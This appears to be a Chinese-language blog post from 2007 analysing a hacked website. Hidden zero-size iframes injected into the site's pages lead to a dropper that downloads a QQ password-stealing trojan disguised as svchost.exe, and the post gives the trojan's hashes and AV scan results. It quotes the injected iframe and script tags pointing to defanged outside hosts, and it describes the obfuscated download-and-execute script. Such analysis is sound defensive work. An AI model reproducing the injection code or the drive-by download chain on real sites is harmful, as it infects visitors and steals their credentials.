js.exe - infected by Trojan-PSW.Win32.QQRob.lp
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
232
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm找不到网页。
hxxp://yu***s*ahi.com/js/test.js的内容为:/------document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/sas.htm width=0 height=0></iframe>")document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/zj.htm width=0 height=0></iframe>")------/
hxxp://yu***s*ahi.com/js/sas.htm内容与hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm相同。
hxxp://yu***s*ahi.com/js/zj.htm找不到网页。
该网站的网页末被加入代码:/------<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe><iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script>------/
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。
解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : d:\test\she.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-28 12:40:25修改时间 : 2007-2-28 12:40:26访问时间 : 2007-2-28 0:0:0大小 : 21096 字节 20.616 KBMD5 : 1fdbf69232ca57bd9f25116def0b622b
瑞星报为:Trojan.DL.Direct.et
Scanned file: she.exe - Infected
she.exe - infected by Trojan-Downloader.Win32.Small.dzu
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
21
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0
she.exe中包含信息:/---I want to dedicate this message to gates. Gates, you suck. Gatesyou really are homosexual---/会下载文件hxxp://i***.th***e***c.cn/y**j*1*6***6/js.exe,保存为:c:\js.exe
文件说明符 : d:\test\js.exe属性 : A---语言 : 英语(美国)文件版本 : 5.2.3790.1830说明 : Generic Host Process for Win32 Services版权 : (C) Microsoft Corporation. All rights reserved.备注 : 产品版本 : 5.2.3790.1830产品名称 : Microsoft(R) Windows(R) Operating System公司名称 : Microsoft Corporation合法商标 : 内部名称 : rpcs.exe源文件名 : rpcs.exe创建时间 : 2007-2-28 12:55:43修改时间 : 2007-2-28 12:54:56访问时间 : 2007-2-28 0:0:0大小 : 237568 字节 232.0 KBMD5 : 993561111ed73214fd3507ff7669f764
瑞星报为:Trojan.DL.Inject.sh
Scanned file: js.exe - Infected
js.exe - infected by Trojan-PSW.Win32.QQRob.lp
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
232
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm找不到网页。
hxxp://yu***s*ahi.com/js/test.js的内容为:/------document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/sas.htm width=0 height=0></iframe>")document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/zj.htm width=0 height=0></iframe>")------/
hxxp://yu***s*ahi.com/js/sas.htm内容与hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm相同。
hxxp://yu***s*ahi.com/js/zj.htm找不到网页。
订阅:
博文 (Atom)